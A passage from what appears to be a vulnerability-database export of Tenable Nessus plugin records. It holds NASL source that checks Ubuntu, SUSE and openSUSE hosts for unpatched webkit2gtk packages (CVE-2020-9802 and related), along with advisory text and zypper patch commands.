'18.04', 'pkgname': 'libwebkit2gtk-4.0-37', 'pkgver': '2.28.3-0ubuntu0.18.04.1'},\n {'osver': '18.04', 'pkgname': 'libwebkit2gtk-4.0-37-gtk2', 'pkgver': '2.28.3-0ubuntu0.18.04.1'},\n {'osver': '18.04', 'pkgname': 'libwebkit2gtk-4.0-dev', 'pkgver': '2.28.3-0ubuntu0.18.04.1'},\n {'osver': '18.04', 'pkgname': 'webkit2gtk-driver', 'pkgver': '2.28.3-0ubuntu0.18.04.1'},\n {'osver': '20.04', 'pkgname': 'gir1.2-javascriptcoregtk-4.0', 'pkgver': '2.28.3-0ubuntu0.20.04.1'},\n {'osver': '20.04', 'pkgname': 'gir1.2-webkit2-4.0', 'pkgver': '2.28.3-0ubuntu0.20.04.1'},\n {'osver': '20.04', 'pkgname': 'libjavascriptcoregtk-4.0-18', 'pkgver': '2.28.3-0ubuntu0.20.04.1'},\n {'osver': '20.04', 'pkgname': 'libjavascriptcoregtk-4.0-bin', 'pkgver': '2.28.3-0ubuntu0.20.04.1'},\n {'osver': '20.04', 'pkgname': 'libjavascriptcoregtk-4.0-dev', 'pkgver': '2.28.3-0ubuntu0.20.04.1'},\n {'osver': '20.04', 'pkgname': 'libwebkit2gtk-4.0-37', 'pkgver': '2.28.3-0ubuntu0.20.04.1'},\n {'osver': '20.04', 'pkgname': 'libwebkit2gtk-4.0-37-gtk2', 'pkgver': '2.28.3-0ubuntu0.20.04.1'},\n {'osver': '20.04', 'pkgname': 'libwebkit2gtk-4.0-dev', 'pkgver': '2.28.3-0ubuntu0.20.04.1'},\n {'osver': '20.04', 'pkgname': 'webkit2gtk-driver', 'pkgver': '2.28.3-0ubuntu0.20.04.1'}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var osver = NULL;\n var pkgname = NULL;\n var pkgver = NULL;\n if (!empty_or_null(package_array['osver'])) osver = package_array['osver'];\n if (!empty_or_null(package_array['pkgname'])) pkgname = package_array['pkgname'];\n if (!empty_or_null(package_array['pkgver'])) pkgver = package_array['pkgver'];\n if (osver && pkgname && pkgver) {\n if (ubuntu_check(osver:osver, pkgname:pkgname, pkgver:pkgver)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'gir1.2-javascriptcoregtk-4.0 / gir1.2-webkit2-4.0 / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-27T14:16:26", "description": "This update for webkit2gtk3 fixes the following issues :\n\nUpdate to version 2.28.3 (bsc#1173998) :\n\n + Enable kinetic scrolling with async scrolling.\n\n + Fix web process hangs on large GitHub pages.\n\n + Bubblewrap sandbox should not attempt to bind empty paths.\n\n + Fix threading issues in the media player.\n\n + Fix several crashes and rendering issues.\n\n + Security fixes: CVE-2020-9802, CVE-2020-9803, CVE-2020-9805, CVE-2020-9806, CVE-2020-9807, CVE-2020-9843, CVE-2020-9850, CVE-2020-13753.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2020-07-30T00:00:00", "type": "nessus", "title": "SUSE SLES12 Security Update : webkit2gtk3 (SUSE-SU-2020:2069-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-13753", "CVE-2020-9802", "CVE-2020-9803", "CVE-2020-9805", "CVE-2020-9806", "CVE-2020-9807", "CVE-2020-9843", "CVE-2020-9850"], "modified": "2022-05-12T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0", "p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0-18-debuginfo", "p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0", "p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0-37-debuginfo", "p-cpe:/a:novell:suse_linux:typelib-1_0-javascriptcore", "p-cpe:/a:novell:suse_linux:typelib-1_0-webkit2", "p-cpe:/a:novell:suse_linux:typelib-1_0-webkit2webextension", "p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles", "p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles-debuginfo", "p-cpe:/a:novell:suse_linux:webkit2gtk3-debugsource", "p-cpe:/a:novell:suse_linux:webkit2gtk3-devel", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2020-2069-1.NASL", "href": "https://www.tenable.com/plugins/nessus/139172", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2020:2069-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(139172);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/12\");\n\n script_cve_id(\n \"CVE-2020-9802\",\n \"CVE-2020-9803\",\n \"CVE-2020-9805\",\n \"CVE-2020-9806\",\n \"CVE-2020-9807\",\n \"CVE-2020-9843\",\n \"CVE-2020-9850\",\n \"CVE-2020-13753\"\n );\n\n script_name(english:\"SUSE SLES12 Security Update : webkit2gtk3 (SUSE-SU-2020:2069-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for webkit2gtk3 fixes the following issues :\n\nUpdate to version 2.28.3 (bsc#1173998) :\n\n + Enable kinetic scrolling with async scrolling.\n\n + Fix web process hangs on large GitHub pages.\n\n + Bubblewrap sandbox should not attempt to bind empty\n paths.\n\n + Fix threading issues in the media player.\n\n + Fix several crashes and rendering issues.\n\n + Security fixes: CVE-2020-9802, CVE-2020-9803,\n CVE-2020-9805, CVE-2020-9806, CVE-2020-9807,\n CVE-2020-9843, CVE-2020-9850, CVE-2020-13753.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1173998\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-13753/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-9802/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-9803/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-9805/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-9806/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-9807/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-9843/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-9850/\");\n # https://www.suse.com/support/update/announcement/2020/suse-su-20202069-1\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?763a3c01\");\n script_set_attribute(attribute:\"solution\", value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE OpenStack Cloud Crowbar 9 :\n\nzypper in -t patch SUSE-OpenStack-Cloud-Crowbar-9-2020-2069=1\n\nSUSE OpenStack Cloud Crowbar 8 :\n\nzypper in -t patch SUSE-OpenStack-Cloud-Crowbar-8-2020-2069=1\n\nSUSE OpenStack Cloud 9 :\n\nzypper in -t patch SUSE-OpenStack-Cloud-9-2020-2069=1\n\nSUSE OpenStack Cloud 8 :\n\nzypper in -t patch SUSE-OpenStack-Cloud-8-2020-2069=1\n\nSUSE OpenStack Cloud 7 :\n\nzypper in -t patch SUSE-OpenStack-Cloud-7-2020-2069=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP5 :\n\nzypper in -t patch SUSE-SLE-SDK-12-SP5-2020-2069=1\n\nSUSE Linux Enterprise Server for SAP 12-SP4 :\n\nzypper in -t patch SUSE-SLE-SAP-12-SP4-2020-2069=1\n\nSUSE Linux Enterprise Server for SAP 12-SP3 :\n\nzypper in -t patch SUSE-SLE-SAP-12-SP3-2020-2069=1\n\nSUSE Linux Enterprise Server for SAP 12-SP2 :\n\nzypper in -t patch SUSE-SLE-SAP-12-SP2-2020-2069=1\n\nSUSE Linux Enterprise Server 12-SP5 :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP5-2020-2069=1\n\nSUSE Linux Enterprise Server 12-SP4-LTSS :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP4-LTSS-2020-2069=1\n\nSUSE Linux Enterprise Server 12-SP3-LTSS :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP3-2020-2069=1\n\nSUSE Linux Enterprise Server 12-SP3-BCL :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP3-BCL-2020-2069=1\n\nSUSE Linux Enterprise Server 12-SP2-LTSS :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP2-2020-2069=1\n\nSUSE Linux Enterprise Server 12-SP2-BCL :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP2-BCL-2020-2069=1\n\nSUSE Enterprise Storage 5 :\n\nzypper in -t patch SUSE-Storage-5-2020-2069=1\n\nHPE Helion Openstack 8 :\n\nzypper in -t patch HPE-Helion-OpenStack-8-2020-2069=1\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-9850\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-13753\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Safari in Operator Side Effect Exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0-18-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0-37-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-JavaScriptCore\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2WebExtension\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk3-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(2|3|4|5)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP2/3/4/5\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libjavascriptcoregtk-4_0-18-2.28.3-2.56.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.28.3-2.56.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libwebkit2gtk-4_0-37-2.28.3-2.56.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.28.3-2.56.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.28.3-2.56.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"typelib-1_0-WebKit2-4_0-2.28.3-2.56.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"typelib-1_0-WebKit2WebExtension-4_0-2.28.3-2.56.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"webkit2gtk-4_0-injected-bundles-2.28.3-2.56.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.28.3-2.56.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"webkit2gtk3-debugsource-2.28.3-2.56.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libjavascriptcoregtk-4_0-18-2.28.3-2.56.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.28.3-2.56.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libwebkit2gtk-4_0-37-2.28.3-2.56.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.28.3-2.56.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.28.3-2.56.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"typelib-1_0-WebKit2-4_0-2.28.3-2.56.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"typelib-1_0-WebKit2WebExtension-4_0-2.28.3-2.56.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"webkit2gtk-4_0-injected-bundles-2.28.3-2.56.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.28.3-2.56.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"webkit2gtk3-debugsource-2.28.3-2.56.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libjavascriptcoregtk-4_0-18-2.28.3-2.56.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.28.3-2.56.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libwebkit2gtk-4_0-37-2.28.3-2.56.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.28.3-2.56.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.28.3-2.56.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"typelib-1_0-WebKit2-4_0-2.28.3-2.56.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"typelib-1_0-WebKit2WebExtension-4_0-2.28.3-2.56.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"webkit2gtk-4_0-injected-bundles-2.28.3-2.56.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.28.3-2.56.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"webkit2gtk3-debugsource-2.28.3-2.56.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"webkit2gtk3-devel-2.28.3-2.56.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libjavascriptcoregtk-4_0-18-2.28.3-2.56.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.28.3-2.56.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libwebkit2gtk-4_0-37-2.28.3-2.56.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.28.3-2.56.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.28.3-2.56.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"typelib-1_0-WebKit2-4_0-2.28.3-2.56.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"typelib-1_0-WebKit2WebExtension-4_0-2.28.3-2.56.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"webkit2gtk-4_0-injected-bundles-2.28.3-2.56.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.28.3-2.56.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"webkit2gtk3-debugsource-2.28.3-2.56.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"webkit2gtk3\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-27T14:15:22", "description": "This update for webkit2gtk3 fixes the following issues :\n\n - Update to version 2.28.3 (bsc#1173998) :\n\n + Enable kinetic scrolling with async scrolling.\n\n + Fix web process hangs on large GitHub pages.\n\n + Bubblewrap sandbox should not attempt to bind empty paths.\n\n + Fix threading issues in the media player.\n\n + Fix several crashes and rendering issues.\n\n + Security fixes: CVE-2020-9802, CVE-2020-9803, CVE-2020-9805, CVE-2020-9806, CVE-2020-9807, CVE-2020-9843, CVE-2020-9850, CVE-2020-13753.\n\nThis update was imported from the SUSE:SLE-15:Update update project.", "cvss3": {}, "published": "2020-07-27T00:00:00", "type": "nessus", "title": "openSUSE Security Update : webkit2gtk3 (openSUSE-2020-1064)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-13753", "CVE-2020-9802", "CVE-2020-9803", "CVE-2020-9805", "CVE-2020-9806", "CVE-2020-9807", "CVE-2020-9843", "CVE-2020-9850"], "modified": "2022-05-13T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18", "p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit", "p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-debuginfo", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-debuginfo", "p-cpe:/a:novell:opensuse:libwebkit2gtk3-lang", "p-cpe:/a:novell:opensuse:typelib-1_0-javascriptcore-4_0", "p-cpe:/a:novell:opensuse:typelib-1_0-webkit2-4_0", "p-cpe:/a:novell:opensuse:typelib-1_0-webkit2webextension-4_0", "p-cpe:/a:novell:opensuse:webkit-jsc-4", "p-cpe:/a:novell:opensuse:webkit-jsc-4-debuginfo", "p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles", "p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles-debuginfo", "p-cpe:/a:novell:opensuse:webkit2gtk3-debugsource", "p-cpe:/a:novell:opensuse:webkit2gtk3-devel", "p-cpe:/a:novell:opensuse:webkit2gtk3-minibrowser", "p-cpe:/a:novell:opensuse:webkit2gtk3-minibrowser-debuginfo", "cpe:/o:novell:opensuse:15.1"], "id": "OPENSUSE-2020-1064.NASL", "href": "https://www.tenable.com/plugins/nessus/138988", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2020-1064.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(138988);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/13\");\n\n script_cve_id(\"CVE-2020-13753\", \"CVE-2020-9802\", \"CVE-2020-9803\", \"CVE-2020-9805\", \"CVE-2020-9806\", \"CVE-2020-9807\", \"CVE-2020-9843\", \"CVE-2020-9850\");\n\n script_name(english:\"openSUSE Security Update : webkit2gtk3 (openSUSE-2020-1064)\");\n script_summary(english:\"Check for the openSUSE-2020-1064 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for webkit2gtk3 fixes the following issues :\n\n - Update to version 2.28.3 (bsc#1173998) :\n\n + Enable kinetic scrolling with async scrolling.\n\n + Fix web process hangs on large GitHub pages.\n\n + Bubblewrap sandbox should not attempt to bind empty\n paths.\n\n + Fix threading issues in the media player.\n\n + Fix several crashes and rendering issues.\n\n + Security fixes: CVE-2020-9802, CVE-2020-9803,\n CVE-2020-9805, CVE-2020-9806, CVE-2020-9807,\n CVE-2020-9843, CVE-2020-9850, CVE-2020-13753.\n\nThis update was imported from the SUSE:SLE-15:Update update project.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1173998\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected webkit2gtk3 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-9850\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Safari in Operator Side Effect Exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk3-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-JavaScriptCore-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2WebExtension-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit-jsc-4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit-jsc-4-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-minibrowser\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-minibrowser-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/27\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif 